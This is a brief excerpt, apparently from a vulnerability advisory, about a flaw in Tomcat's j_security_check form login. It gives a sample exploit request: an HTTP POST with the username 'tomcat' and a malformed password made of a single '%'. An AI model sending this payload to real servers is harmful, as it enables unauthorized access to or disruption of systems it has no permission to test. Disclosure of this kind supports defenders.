Attackers can use readily available tools to exploit this issue.

The following example POST data is available:

POST /j_security_check HTTP/1.1
Host: www.example.com

j_username=tomcat&j_password=%